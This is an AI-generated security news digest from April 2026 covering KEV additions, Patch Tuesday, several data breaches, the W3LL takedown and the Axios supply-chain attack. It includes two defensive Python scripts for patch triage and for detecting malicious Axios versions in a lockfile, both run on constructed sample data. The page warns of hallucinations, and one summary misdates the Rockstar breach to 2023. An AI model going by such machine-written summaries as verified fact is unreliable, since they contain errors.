Information Security News | AI Aggregator

Please be mindful of possible hallucinations. Verify information prior to taking action.
Zombie Microsoft bugs rise from the dead, pave way for crims and ransomware scum
Date: 2026-04-13 | Source: The Register
Four Microsoft vulnerabilities have been added to CISA's Known Exploited Vulnerabilities catalog. They include CVE-2025-60710 (Windows privilege escalation), CVE-2023-36424 (Windows Common Log File System Driver flaw), CVE-2023-21529 (Microsoft Exchange Server RCE), and CVE-2012-1854 (Visual Basic for Applications RCE). Federal agencies have until April 27 to patch these vulnerabilities, which pose significant risks, especially with ransomware exploitation noted for CVE-2023-21529.
2026-04-14 | The Hacker News: CISA Adds 6 Known Exploited Flaws in Fortinet, Microsoft, and Adobe Software
CISA added six vulnerabilities to its Known Exploited Vulnerabilities catalog, including CVE-2026-21643 (Fortinet, CVSS 9.1), CVE-2020-9715 (Adobe, CVSS 7.8), CVE-2023-36424 (Microsoft, CVSS 7.8), CVE-2023-21529 (Microsoft, CVSS 8.8), CVE-2025-60710 (Microsoft, CVSS 7.8), and CVE-2012-1854 (Microsoft, CVSS 7.8). Active exploitation has been noted for some, with FCEB agencies required to implement fixes by April 27, 2026.
2026-04-14 | Security Affairs: U.S. CISA adds Adobe, Fortinet, Microsoft Exchange Server, and Microsoft Windows flaws to its Known Exploited Vulnerabilities catalog
U.S. CISA added several vulnerabilities to its Known Exploited Vulnerabilities catalog, including CVE-2026-34621 (Adobe Acrobat), CVE-2012-1854 (Microsoft VBA), CVE-2020-9715 (Adobe Acrobat), CVE-2023-21529 (Microsoft Exchange Server), CVE-2023-36424 (Microsoft Windows), CVE-2025-60710 (Microsoft Windows), and CVE-2026-21643 (Fortinet). Federal agencies must address these by April 27, 2026, with CVE-2026-21643 due by April 16, 2026. Prompt patching is essential to mitigate risks.
2026-04-14 | Cyber Security News: CISA Warns of Microsoft Exchange and Windows CLFS Vulnerabilities Exploited in Attacks
CISA has warned of two critical Microsoft vulnerabilities: CVE-2023-21529 in Exchange Server, allowing remote code execution via deserialization of untrusted data, and CVE-2023-36424 in Windows CLFS, enabling local privilege escalation due to improper memory validation. Federal agencies must patch these by April 27, 2026, while private organizations are strongly urged to do the same. Immediate actions include applying patches, monitoring for unusual activity, and considering discontinuation of vulnerable products if necessary.
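The KEV items above share one operational question: which of them apply to our estate, in what order, and which deadline has already passed. The script below is an added example, not code from CISA or any of the outlets quoted; the KEV records are a constructed subset using the field names of the public KEV JSON feed, with the CVE IDs, vendors, due dates and the ransomware note for CVE-2023-21529 taken from the summaries above. The "Unknown" ransomware flags on the other entries, the reference date and the inventory list are assumptions for the demonstration.

```python
"""Rank CISA KEV entries that apply to our inventory by remediation due date.

Added example; constructed KEV subset (field names follow the public KEV JSON
feed, values taken from the reporting above). Ransomware flags other than the
one for CVE-2023-21529 are assumed "Unknown".
"""
from dataclasses import dataclass
from datetime import date

KEV_ENTRIES = [
    {"cveID": "CVE-2026-21643", "vendorProject": "Fortinet",
     "dueDate": "2026-04-16", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2023-21529", "vendorProject": "Microsoft",
     "dueDate": "2026-04-27", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2023-36424", "vendorProject": "Microsoft",
     "dueDate": "2026-04-27", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2025-60710", "vendorProject": "Microsoft",
     "dueDate": "2026-04-27", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2012-1854", "vendorProject": "Microsoft",
     "dueDate": "2026-04-27", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2020-9715", "vendorProject": "Adobe",
     "dueDate": "2026-04-27", "knownRansomwareCampaignUse": "Unknown"},
]


@dataclass
class Finding:
    cve: str
    vendor: str
    due: date
    days_left: int      # negative once the due date has passed
    ransomware: bool


def triage(kev_entries, inventory_cves, today_iso):
    """Return a Finding for every KEV entry whose CVE is also in our inventory.

    Sorted by urgency: earliest due date first; on the same day, entries with
    known ransomware use come first, then by CVE ID for a stable order.
    """
    today = date.fromisoformat(today_iso)
    wanted = {c.strip().upper() for c in inventory_cves}
    findings = []
    for entry in kev_entries:
        cve = entry["cveID"].upper()
        if cve not in wanted:
            continue
        due = date.fromisoformat(entry["dueDate"])
        findings.append(Finding(
            cve=cve,
            vendor=entry["vendorProject"],
            due=due,
            days_left=(due - today).days,
            ransomware=entry.get("knownRansomwareCampaignUse") == "Known",
        ))
    findings.sort(key=lambda f: (f.due, not f.ransomware, f.cve))
    return findings


def report(findings):
    """Plain-text table of the findings, one line per CVE."""
    lines = []
    for f in findings:
        state = "OVERDUE" if f.days_left < 0 else f"due in {f.days_left}d"
        tag = "  [ransomware use known]" if f.ransomware else ""
        lines.append(f"{f.cve:<16}{f.vendor:<11}{f.due}  {state}{tag}")
    return "\n".join(lines)


if __name__ == "__main__":
    # Assumed inventory from our own scanner; IDs may arrive in any case.
    # CVE-2026-33825 is on this page but not in the constructed KEV subset,
    # so it is ignored here.
    inventory = ["cve-2026-21643", "CVE-2023-21529", "CVE-2025-60710",
                 "CVE-2023-36424", "CVE-2026-33825"]
    print(report(triage(KEV_ENTRIES, inventory, "2026-04-20")))
```

Run against the real feed, the only change is loading `vulnerabilities` from the KEV JSON instead of `KEV_ENTRIES`; the ordering rule is the useful part, since a 2012 VBA bug and a 2026 Fortinet bug can carry very different deadlines despite being added on the same day.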
2026-04-14 | Cyber Security News: Microsoft Patch Tuesday April 2026 – 168 Vulnerabilities Fixed, Including Actively Exploited 0-day
Microsoft's April 2026 Patch Tuesday addresses 168 vulnerabilities, including CVE-2026-32201, a critical SharePoint Server spoofing vulnerability under active exploitation. CVE-2026-33825, a Microsoft Defender elevation of privilege vulnerability, is also highlighted due to public disclosure. Key patches include critical RCE vulnerabilities in Windows TCP/IP and Active Directory. Security teams are urged to prioritize these patches, especially CVE-2026-32201, to mitigate risks. Immediate action is recommended across various Microsoft products.
2026-04-14 | Cyberscoop: Microsoft drops its second-largest monthly batch of defects on record
Microsoft addressed 165 vulnerabilities in its April Patch Tuesday update, marking its second-largest monthly release. Notably, CVE-2026-32201, a zero-day in Microsoft Office SharePoint, allows unauthenticated attackers to view and alter sensitive information. CISA added it to its exploited vulnerabilities catalog. Another high-severity flaw, CVE-2026-33825 in Microsoft Defender, could enable local privilege escalation. Microsoft also disclosed two critical vulnerabilities, CVE-2026-33824 and CVE-2026-26149, but deemed them less likely to be exploited.
2026-04-14 | Cisco Talos: Microsoft Patch Tuesday for April 2026 - Snort Rule and Prominent Vulnerabilities
Microsoft's April 2026 Patch Tuesday addresses 165 vulnerabilities, including eight critical ones. Notable CVEs include CVE-2026-23666 (DoS in .NET), CVE-2026-32157 (code execution in Remote Desktop Client), and CVE-2026-33824 (remote code execution in IKE). Additional vulnerabilities affect Microsoft Office and Windows components, with some already exploited in the wild. Talos has released a new Snort rule set to detect exploitation attempts, urging users to update their security rules.
2026-04-14 | The Register: Microsoft's massive Patch Tuesday: It's raining bugs
Microsoft's April Patch Tuesday addressed 165 new CVEs, including CVE-2026-32201, a spoofing vulnerability in SharePoint Server under active exploitation. This flaw allows unauthorized attackers to manipulate information presentation, potentially aiding phishing and social engineering attacks. Another notable bug, CVE-2026-33825, is an elevation of privilege vulnerability in Microsoft Defender, linked to exploit code published by a researcher. Users are advised to test and deploy fixes promptly.
2026-04-14 | Krebs on Security: Patch Tuesday, April 2026 Edition
Microsoft's April 2026 Patch Tuesday addressed 167 vulnerabilities, including a SharePoint Server zero-day (CVE-2026-32201) that allows content spoofing, increasing phishing risks. An SQL Server vulnerability (CVE-2026-33120) enables remote code execution. Windows Defender's privilege escalation flaw (CVE-2026-33825) was also patched. Adobe fixed an actively exploited flaw (CVE-2026-34621). This month saw a record number of patches, attributed to enhanced AI capabilities in vulnerability detection. Users are advised to restart browsers to apply updates.
2026-04-14 | Rapid7: Patch Tuesday - April 2026
On April 2026 Patch Tuesday, Microsoft published 167 vulnerabilities, with 19 deemed likely to be exploited. Notably, CVE-2026-32201 is a spoofing vulnerability in SharePoint, and CVE-2026-33825 is a local privilege escalation vulnerability in Microsoft Defender. CVE-2026-33824 is a critical unauthenticated remote code execution vulnerability in Windows IKE Services. Patches are available for all affected software, and Microsoft lifecycle support updates were also announced, affecting various legacy tools.
2026-04-15 | Cyber Security News: Microsoft SharePoint Server 0-Day Vulnerability Actively Exploited in Attacks
A critical zero-day spoofing vulnerability in Microsoft SharePoint Server, tracked as CVE-2026-32201, is actively exploited, confirmed by Microsoft on April 14, 2026. It affects multiple SharePoint versions with a CVSS score of 6.5. The flaw allows unauthenticated remote attackers to perform spoofing attacks. Microsoft released emergency patches for affected versions and recommends immediate application, auditing access logs, and restricting external-facing instances. Organizations should monitor for indicators of compromise.
Booking.com warns customers of hack that exposed their data
Date: 2026-04-13 | Source: The Guardian
Booking.com experienced a data breach where unauthorized parties accessed customer booking information. The company noted suspicious activity and updated reservation PINs to contain the issue, informing affected guests. While financial information was not compromised, accessed data may include booking details, names, emails, addresses, and phone numbers. In a previous incident, Booking.com was fined €475,000 by the Dutch privacy regulator for reporting a breach 22 days late. The company has faced increasing online scams and previous phishing incidents.
2026-04-13 | Security Magazine: Booking.com Customer Data Hacked, Exposed
Booking.com experienced a data breach, exposing customer booking information. Unauthorized third parties accessed data, prompting the company to change reservation PINs and notify guests. While financial information remains secure, compromised data may include names, emails, phone numbers, and addresses. The extent of the impact on customers is currently undisclosed. Booking.com, based in Amsterdam, lists over 2 million properties worldwide.
2026-04-13 | The Register: Booking.com warns reservation data may have checked out with intruders
Booking.com has alerted customers that their reservation details may have been accessed by unauthorized parties. The exposed data includes names, contact details, reservation dates, and messages exchanged with hotels. While financial data was not compromised, the company warned of increased phishing risks due to the nature of the data. Booking.com reset booking PINs as a precaution but did not disclose the number of affected users or how the breach occurred. This incident follows a previous breach in 2021 involving hotel staff logins.
2026-04-13 | TechCrunch: Booking.com confirms hackers accessed customers’ data
Booking.com confirmed that hackers accessed customers' personal data, including names, emails, addresses, phone numbers, and booking details. The company notified affected customers of the breach, stating that unauthorized third parties accessed certain booking information. Affected users reported receiving phishing messages via WhatsApp containing their booking details. Booking.com has since updated reservation PINs and assured that financial information was not compromised. Specific details on the number of affected customers were not disclosed.
2026-04-13 | Security Affairs: Hackers access Booking.com user data, company secures systems
Hackers accessed Booking.com user data, including names, emails, phone numbers, and booking details. The incident has been contained, and the company reset reservation PINs. No payment data was compromised. Booking.com has notified affected users and advised them to be vigilant against phishing attempts, as scammers have reportedly contacted users with real reservation details. The extent of the impact and the method of the attack remain unclear.
2026-04-13 | Tomsguide: Booking.com confirms massive data breach that could impact millions of travelers — how to stay safe
Booking.com has confirmed a data breach affecting customer reservation data, including full names, email and postal addresses, and phone numbers. The company has reset PINs for affected reservations and will notify impacted users via email. While the number of affected individuals remains undisclosed, millions may be at risk. Users are advised to be cautious of phishing attempts and consider identity theft protection services, although it is unclear if Booking.com is offering any.
2026-04-14 | Times Now: Massive Booking.com Data Breach Confirmed, Millions At Risk: Check If You’re Affected
A data breach at Booking.com has been confirmed, putting millions of users at risk. Affected individuals are advised to change their passwords and check their reservation details, including updating their PINs. Booking.com asserts that the situation is currently under control, but this incident highlights vulnerabilities even in major platforms.
2026-04-14 | Cyber Security News: Booking.com Confirms Data Breach — Hackers Accessed Customers’ Personal Information
Booking.com confirmed a data breach where unauthorized third parties accessed customers' personal information, including names, email addresses, phone numbers, and reservation details. The company reset PINs for affected reservations and notified impacted guests. While financial information was reportedly not accessed, concerns arise as evidence suggests stolen data is being used for phishing attacks. Users are advised to remain vigilant against unsolicited requests and verify communications through official channels.
2026-04-14 | TechRadar: Booking.com confirms reservation data breach — tells customers hackers 'may have been able to access certain booking information'
Booking.com has confirmed a data breach affecting users' reservation details, potentially exposing names, emails, addresses, and phone numbers. The company has reset reservation PINs and warned users about possible phishing attacks related to recent bookings. Reports indicate that the breach may involve information from bookings made within the past week. Booking.com, a highly visited travel platform, is a significant target for cybercriminals.
2026-04-14 | Hack Read: Booking.com Confirms Data Breach as Hackers Access Customer Details
Booking.com has confirmed a data breach where a third party accessed customer reservation data, including names, email addresses, phone numbers, and postal addresses, but not payment information. The company has reset PIN codes and warned users about potential phishing attempts using the exposed data. The breach's specifics, including the number of affected users, remain undisclosed. Experts caution that the lack of details increases the risk of phishing and identity fraud.
2026-04-14 | Help Net Security: Booking.com data breach: Customer reservation data exposed
Booking.com experienced a data breach where unauthorized third parties accessed customer reservation data, including names, emails, addresses, and phone numbers. Financial information was not compromised. The company has contained the issue and updated booking PINs for affected users. Customers reported phishing attempts using personal details linked to the breach. The Vect hacking group claimed responsibility, but this remains unconfirmed. Users are advised to be vigilant against potential scams.
Basic-Fit Data Breach Exposes Millions of Users Across Multiple Countries
Date: 2026-04-13 | Source: Cyber Security News
Basic-Fit confirmed a data breach affecting approximately 1 million members, with around 200,000 in the Netherlands. The breach involved unauthorized access to membership systems, exposing sensitive data including names, addresses, emails, phone numbers, dates of birth, and bank account details. No identity documents or passwords were compromised. Basic-Fit notified the Dutch Data Protection Authority and affected members. Experts advise vigilance against phishing and monitoring bank statements for anomalies. Investigations are ongoing.
2026-04-13 | The Register: Gym giant Basic-Fit confirms data on a million members stolen in cyberattack
Basic-Fit confirmed that data, including bank details, of approximately one million members was stolen in a cyberattack. The breach affected members in six countries: the Netherlands, Belgium, France, Germany, Luxembourg, and Spain. Basic personal information was compromised, but passwords and identity documents were not accessed. The company has notified relevant authorities and is investigating the incident. Customers are advised to be vigilant against phishing attempts.
2026-04-14 | TechRadar: Basic-Fit gym group data breach exposes details of over 1 million members — here's what we know
Basic-Fit has confirmed a data breach affecting approximately 1 million customers across six countries, including the Netherlands, Belgium, Luxembourg, France, Spain, and Germany. Stolen data includes names, contact details, dates of birth, and bank information, but no passwords or IDs were exposed. The breach was detected quickly, and while there is no evidence of data misuse, phishing risks are anticipated. Basic-Fit has notified relevant data protection authorities regarding the unauthorized access.
2026-04-14 | Help Net Security: Basic-Fit hack compromises data of up to 1 million members
Basic-Fit, a European gym chain, reported a data breach affecting up to 1 million members across several countries, including the Netherlands, Belgium, Luxembourg, France, Spain, and Germany. The breach exposed personal data such as names, addresses, email addresses, phone numbers, dates of birth, and bank account details, but not passwords or identification documents. Basic-Fit detected the unauthorized access quickly and has informed affected members to be vigilant against phishing attempts.
2026-04-14 | Security Affairs: Personal data of 1 million gym members compromised in Basic-Fit security incident
A data breach at Basic-Fit has compromised the personal data of approximately 1 million gym members, including names, birth dates, and bank details. Basic-Fit says it detected the unauthorized access quickly; affected members are spread across several countries, with around 200,000 in the Netherlands. Basic-Fit has notified the relevant data protection authority and is investigating the incident. No ID documents or passwords were accessed, and there is currently no evidence of data misuse.
FBI Atlanta and Indonesian National Police Take Down W3LLSTORE Phishing Marketplace
Date: 2026-04-12 | Source: Hack Read
The FBI Atlanta Field Office and Indonesian National Police dismantled the W3LLSTORE phishing marketplace, linked to over $20 million in fraud. The operation, using the W3LL phishing kit, allowed cybercriminals to create fake login pages and sell stolen credentials. From 2019 to 2023, it facilitated over 25,000 compromised accounts. Following its closure, the service continued via encrypted platforms. The kit was involved in over 17,000 global attacks, primarily targeting the U.S., with significant impacts on manufacturing and technology sectors.
2026-04-13 | Infosecurity Magazine: FBI Dismantles $20m Phishing Operation W3LL
US and Indonesian law enforcement dismantled the W3LL phishing network, responsible for over $20 million in fraud. The FBI seized the w3ll.store domain, which sold a phishing kit enabling impersonation of legitimate login pages. Active from 2019 to 2023, the marketplace facilitated over 25,000 compromised accounts. The operation continued via encrypted messaging apps, potentially targeting over 17,000 victims globally. The threat actor, identified as ‘G.L.,’ had been active since at least 2017.
2026-04-13 | The Hacker News: FBI and Indonesian Police Dismantle W3LL Phishing Network Behind $20M Fraud Attempts
The FBI and Indonesian Police have dismantled the W3LL phishing network, which attempted over $20 million in fraud by stealing account credentials using a toolkit sold for about $500. The alleged developer, G.L., was detained, and key domains were seized. The W3LL phishing kit allowed criminals to create fake login pages, targeting primarily Microsoft 365 credentials. Between 2019 and 2023, over 25,000 compromised accounts were sold. The operation continued even after the W3LL Store's shutdown in 2023.
2026-04-13 | Cybersecurity Dive: US, Indonesia shut down ‘sophisticated’ phishing kit
The FBI and Indonesian law enforcement dismantled the W3LL phishing kit, a global cybercrime tool that allowed hackers to create fake login portals for popular services. The operation led to the arrest of the kit's developer, G.L., and the seizure of its infrastructure. W3LL facilitated over $20 million in fraud and was used against 17,000 victims from 2023 to 2024. This takedown marks a significant international law enforcement collaboration against cybercrime.
2026-04-13 | Recorded Future: FBI, Indonesia take down W3LL phishing tool
The FBI and Indonesian law enforcement disrupted the W3LL phishing tool, a service enabling hackers to create fake login portals for $500. The FBI seized infrastructure and arrested the alleged developer, G.L. W3LL facilitated access to over 25,000 compromised accounts, leading to $20 million in fraud. It targeted 56,000 corporate Microsoft 365 accounts from October 2022 to July 2023. Despite its shutdown, the tool persisted through encrypted platforms, affecting 17,000 victims globally from 2023 to 2024.
2026-04-13 | TechCrunch: FBI announces takedown of phishing operation that targeted thousands of victims
The FBI announced the takedown of a global phishing operation named W3LL, which targeted over 17,000 victims. The operation's website was seized, and the alleged developer, G.L., was detained. Cybercriminals used a $500 phishing kit to create fake login pages, attempting over $20 million in fraud. The marketplace also facilitated the sale of more than 25,000 compromised accounts. The FBI collaborated with Indonesian police in this operation.
2026-04-13 | CNET: The Feds Took Down a 'Full-Service Cybercrime Platform' Behind $20M in Phishing
The FBI and Indonesian National Police dismantled the W3LL phishing kit, a cybercrime platform responsible for approximately $20 million in fraud. Active since 2019, the kit targeted Microsoft 365 accounts and allowed criminals to bypass multi-factor authentication. The FBI estimates over 25,000 compromised accounts were housed in the W3LL marketplace, with an additional 17,000 accounts compromised in 2023-2024. The developer, known as G.L, has been detained, but similar tools may still exist.
2026-04-14 | Cyber Security News: W3LL Phishing Kit Takedown Hits Global Credential Theft and MFA Bypass Operation
The FBI, in collaboration with Indonesian law enforcement, dismantled the W3LL phishing kit, a global operation enabling MFA bypass and over $20 million in fraud attempts. The kit, sold for $500, allowed attackers to harvest credentials and session tokens, facilitating unauthorized access. The W3LLSTORE marketplace sold over 25,000 compromised accounts from 2019 to 2023. The operation led to the arrest of the developer and seizure of critical infrastructure, disrupting a significant cybercrime resource.
2026-04-14 | Help Net Security: W3LL phishing service sold for $500 dismantled by the FBI
The FBI and Indonesian authorities dismantled the W3LL phishing kit, a tool for creating fake login pages to steal credentials, linked to over $20 million in fraud. For $500, users accessed the kit to bypass MFA and capture session data. The operation, tied to the W3LLSTORE marketplace, sold over 25,000 accounts from 2019 to 2023. After W3LLSTORE's closure, the kit was rebranded and used against 17,000 victims globally in 2023-2024. Reported losses from cyber-enabled fraud reached $17.7 billion in 2025.
2026-04-14 | TechRadar: 'This wasn’t just phishing — it was a full-service cybercrime platform': FBI reveals takedown of notorious W3LL phishing operation targeting thousands of victims
The FBI, in collaboration with Indonesian police, has detained an individual linked to the W3LL phishing kit, a platform that facilitated credential theft and attempted $20 million in fraud. The kit, priced at $500, enabled the creation of spoofed websites and phishing emails. Additionally, the W3LLSTORE marketplace sold over 25,000 compromised accounts. Law enforcement seized key infrastructure and domains, significantly disrupting this cybercrime operation targeting over 17,000 victims globally.
Two different attackers poisoned popular open source tools - and showed us the future of supply chain compromise
Date: 2026-04-11 | Source: The Register
Two supply chain attacks in March targeted open-source tools Trivy and Axios, compromising tens of thousands of organizations. TeamPCP injected malware into Trivy, stealing CI/CD secrets and credentials from over 10,000 organizations. Meanwhile, a North Korean group hijacked Axios to deliver a remote-access trojan, affecting users who downloaded compromised packages. Experts emphasize the need for software bill-of-materials (SBOMs) and rapid detection strategies to mitigate risks from such attacks.
2026-04-11 | Cyber Security News: OpenAI Warns macOS Users to Update ChatGPT and Codex Immediately
OpenAI disclosed a security incident on March 31, 2026, involving a compromise of the Axios JavaScript library, linked to North Korean threat actors. Malicious updates introduced a Remote Access Trojan in versions v1.14.1 and v0.30.4, affecting OpenAI's macOS applications. While no user data was compromised, OpenAI is revoking all macOS security certificates and requiring users to update applications by May 8, 2026. Recommendations include implementing dependency pinning and workflow audits to mitigate supply chain attack risks.
2026-04-13 | The Hacker News: OpenAI Revokes macOS App Certificate After Malicious Axios Supply Chain Incident
OpenAI revoked its macOS app signing certificate after a supply chain attack involving the Axios library on March 31. The attack, attributed to North Korean group UNC1069, involved malicious versions of Axios that deployed a backdoor. OpenAI found no evidence of data exfiltration but is treating the certificate as compromised. Older macOS apps will lose support by May 8, 2026. The incident highlights risks in software supply chains, prompting recommendations for enhanced security measures.
2026-04-13 | TechRadar: OpenAI flags third-party data issue — all macOS users should update now
OpenAI rotated its macOS code-signing certificate following a breach at Axios, a third-party tool it uses, which led to a malicious version (1.14.1) being integrated into its app-signing workflow. Although there is no evidence of data theft, OpenAI deprecated older app versions and warned that they will cease receiving updates after May 8, 2026. The affected applications include ChatGPT Desktop, Codex, Codex-cli, and Atlas. User data remains secure, and no alterations to the software were detected.
2026-04-13 | Hack Read: OpenAI Rotates macOS Certificates Following Axios Supply Chain Breach
OpenAI rotated its macOS code-signing certificates after a supply chain attack compromised the Axios library on 31 March 2026. Hackers accessed the account of lead developer Jason Saayman, leading to the release of malicious Axios versions 1.14.1 and 0.30.4 containing a backdoor. OpenAI's internal systems fetched this compromised code, prompting the revocation of certificates for affected apps: ChatGPT Desktop, Codex, Codex-cli, and Atlas. New versions are required by 8 May 2026 to avoid security risks. The attack is linked to the North Korea-associated group UNC1069.
2026-04-13 | Cyberscoop: OpenAI’s Mac apps need updates thanks to the Axios hack
OpenAI updated its macOS applications following a supply-chain attack that compromised the Axios library, requiring users to upgrade to the latest versions. Although no user data was accessed, OpenAI is treating its security certificate as compromised due to the incident. The attack, attributed to a North Korean group, lasted three hours before the malicious software was removed. Older app versions may lose functionality after the certificate revocation on May 8. OpenAI has corrected the misconfiguration in its GitHub workflow.
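The Axios entries above recommend dependency pinning and workflow audits, and the earlier Trivy/Axios summary asks for SBOMs and rapid detection. Both come down to the same two questions for an npm project: which direct dependencies can float to a new release, and is a known-bad version of a package already sitting in the lockfile, possibly nested under another package. The script below is an added example and not code from OpenAI, the Axios project or any outlet quoted here. The two malicious Axios versions (1.14.1 and 0.30.4) are the ones reported above; the package.json and package-lock.json contents are constructed for the demonstration, and the project and helper package names in them are not real.

```python
"""Audit an npm project for floating version ranges and for installed copies
of a package at versions reported as malicious.

Added example; sample files are constructed. The Axios versions in KNOWN_BAD
are the ones the reporting above names as backdoored.
"""
import json
import re

# Package -> versions reported as backdoored. Extend with further advisories.
KNOWN_BAD = {"axios": {"1.14.1", "0.30.4"}}

# Exact semver: MAJOR.MINOR.PATCH with optional pre-release/build metadata.
# Anything else (^1.14.0, ~5.4.0, >=1, 1.x, *, "latest") can float to a new release.
EXACT_SEMVER = re.compile(r"^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?$")

# Constructed sample package.json (not a real project).
PACKAGE_JSON = json.loads("""
{
  "name": "example-desktop-app",
  "dependencies": {
    "axios": "^1.14.0",
    "lodash": "4.17.21"
  },
  "devDependencies": {
    "typescript": "~5.4.0"
  }
}
""")

# Constructed sample package-lock.json (lockfileVersion 3 layout). The nested
# copy under "legacy-client" (a made-up package) is the case a grep for the
# top-level entry would miss.
PACKAGE_LOCK = json.loads("""
{
  "name": "example-desktop-app",
  "lockfileVersion": 3,
  "packages": {
    "": { "name": "example-desktop-app" },
    "node_modules/axios": { "version": "1.14.1" },
    "node_modules/axios-helpers": { "version": "1.0.0" },
    "node_modules/lodash": { "version": "4.17.21" },
    "node_modules/legacy-client": { "version": "2.0.0" },
    "node_modules/legacy-client/node_modules/axios": { "version": "0.30.4" },
    "node_modules/typescript": { "version": "5.4.5" }
  }
}
""")


def is_pinned(spec):
    """True only for an exact version string."""
    return bool(EXACT_SEMVER.match(spec.strip()))


def unpinned_dependencies(package_json):
    """(section, name, spec) for every direct dependency that is not pinned."""
    out = []
    for section in ("dependencies", "devDependencies"):
        for name, spec in package_json.get(section, {}).items():
            if not is_pinned(spec):
                out.append((section, name, spec))
    return out


def installed_copies(lock, name):
    """(path, version) for every copy of `name` in the lockfile, including
    nested copies that other packages pull in. Matches the exact package
    directory, so "axios-helpers" is not mistaken for "axios"."""
    needle = "node_modules/" + name
    return [(path, meta.get("version", ""))
            for path, meta in lock.get("packages", {}).items()
            if path == needle or path.endswith("/" + needle)]


def malicious_installs(lock, known_bad=KNOWN_BAD):
    """(path, version) for every installed copy at a known-bad version."""
    hits = []
    for name, bad_versions in known_bad.items():
        for path, version in installed_copies(lock, name):
            if version in bad_versions:
                hits.append((path, version))
    return hits


def audit(package_json, lock, known_bad=KNOWN_BAD):
    """Human-readable findings: floating ranges first, then malicious installs."""
    findings = [f"UNPINNED {s}.{n} = {spec}"
                for s, n, spec in unpinned_dependencies(package_json)]
    findings += [f"MALICIOUS {p}@{v}" for p, v in malicious_installs(lock, known_bad)]
    return findings


if __name__ == "__main__":
    for line in audit(PACKAGE_JSON, PACKAGE_LOCK):
        print(line)
```

Pinning the spec in package.json only stops the range from floating on the next `npm install`; it does nothing about a bad version the lockfile already records, which is why the second check reads the lockfile rather than the manifest. In a build pipeline, run this against the committed lockfile and install with `npm ci` so the resolved versions in the lockfile are the ones that actually get installed.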
ShinyHunters Claims Rockstar Games Snowflake Breach via Anodot
Date: 2026-04-11 | Source: Hack Read
On April 11, 2026, the ShinyHunters hacking group claimed to have accessed Rockstar Games' Snowflake environment via a breach at Anodot, a SaaS platform. They threatened to leak data unless a ransom was paid by April 14. The attackers reportedly extracted authentication tokens from Anodot, allowing them to access Snowflake accounts without exploiting vulnerabilities. Rockstar has not yet commented on the claims, which highlight risks associated with cloud integrations and exposed access controls.
2026-04-12 | Times Now: GTA 6 Data Breached By Shiny Hunters? All You Need To Know
On April 11, a message was posted on a dark web leak site by Shiny Hunters, claiming a breach of Rockstar Games' data via Anodot, a SaaS platform for cloud cost monitoring. The attackers set a deadline of April 14, 2026, threatening public exposure if their demands were not met. They warned that failure to comply would lead to additional digital issues for Rockstar Games, urging them to act to avoid becoming a headline.
2026-04-13 | TechRadar: Rockstar confirms major third-party data breach: GTA VI maker says 'no impact on our organization or our players'
Rockstar Games confirmed a data breach linked to the Anodot supply chain attack by the ShinyHunters cybercrime group, which accessed limited non-material company information. ShinyHunters demands a ransom by April 14, 2026, threatening to leak the stolen files otherwise. Rockstar stated there is no impact on their organization or players, and the nature of the accessed data remains unclear. ShinyHunters has previously targeted major companies like Microsoft and Cisco.
2026-04-13 | The Register: Rockstar Games gets a taste of grand theft data
ShinyHunters claims to have compromised Rockstar Games' data through a third-party breach involving Anodot, a cloud cost-monitoring tool. They threatened to leak data unless contacted by April 14, 2026. Rockstar confirmed a limited amount of non-material information was accessed but stated there was no impact on players. The breach reportedly involved the misuse of authentication tokens, highlighting vulnerabilities in SaaS integrations. ShinyHunters has a history of targeting APIs and identity systems.
2026-04-13 | Help Net Security: Rockstar Games receives “pay or leak” warning after cyberattack
Rockstar Games confirmed a cyberattack by the hacking group ShinyHunters, which accessed its Snowflake environment via the Anodot platform. The attackers extracted authentication tokens, allowing access to the Snowflake account. On April 11, ShinyHunters threatened to leak the data unless paid by April 14. Anodot reported issues with its connectors on April 4. Rockstar stated that only a limited amount of non-material information was accessed, with no impact on the organization or players.
2026-04-13 | DIGIT: Rockstar Games Suffers Hack in Third-party Cloud Breach
Rockstar Games experienced a breach due to a third-party cloud vendor, with the extortion group ShinyHunters claiming access to compromised data. The breach involved Rockstar's Snowflake environment, reached through Anodot, a cloud analytics service. Rockstar confirmed a limited amount of non-material company information was compromised but stated there was no impact on the organization or its players. The nature of the accessed data is believed to be internal commercial information, not personal data.
2026-04-13 | Recorded Future: Hackers claim breach of Rockstar Games via cloud analytics platform
The ShinyHunters cybercrime group has claimed a breach of Rockstar Games via the Anodot cloud analytics platform, threatening to release stolen data unless a ransom is paid by April 14. Rockstar confirmed limited non-material data was accessed but downplayed the impact. The breach involved authentication tokens from Anodot, allowing access to customer Snowflake accounts. This incident follows a broader supply-chain compromise affecting multiple Snowflake customers. ShinyHunters has a history of targeting major companies for financial gain.
2026-04-13 | TechCrunch: Hack at Anodot leaves over a dozen breached companies facing extortion
Hackers from the ShinyHunters group breached Anodot on April 4, stealing authentication tokens and customer data from at least a dozen companies, including Rockstar Games. Anodot's data connectors failed, preventing customer access to cloud data. Snowflake cut off access after detecting unusual activity. ShinyHunters are known for extorting victims and using social engineering to gain access to corporate networks. The breach highlights vulnerabilities in software used by major corporations for data storage and analysis.
2026-04-13 | The Guardian: Hacker group threatens to release Grand Theft Auto VI data in Rockstar Games attack
Rockstar Games has been targeted by the hacker group ShinyHunters, which threatens to release stolen data unless a ransom is paid by 14 April 2026. The group claims to have accessed company servers operated by a third party. Rockstar stated that only non-material company information was compromised and that player data remains secure. ShinyHunters is linked to previous attacks on companies like Microsoft and Cisco. This incident follows a prior breach in 2022, where in-development footage of Grand Theft Auto VI was leaked.
2026-04-13 | CNET: Grand Theft Data: Hackers Demand Ransom Payment From Rockstar Games
On April 11, 2023, Rockstar Games confirmed a data breach involving its third-party provider Anodot, exploited by the ShinyHunters ransomware group. The hackers accessed corporate information, including contracts and financial documents, but claimed player data remains safe. They threatened to release the stolen data on April 14 unless a ransom is paid. ShinyHunters has previously targeted major companies, raising concerns about the impact on game development and internal assets.
2026-04-14 | Cyber Security News: Rockstar’s GTA Game Hacked – Attackers published 78.6 Million Records Online
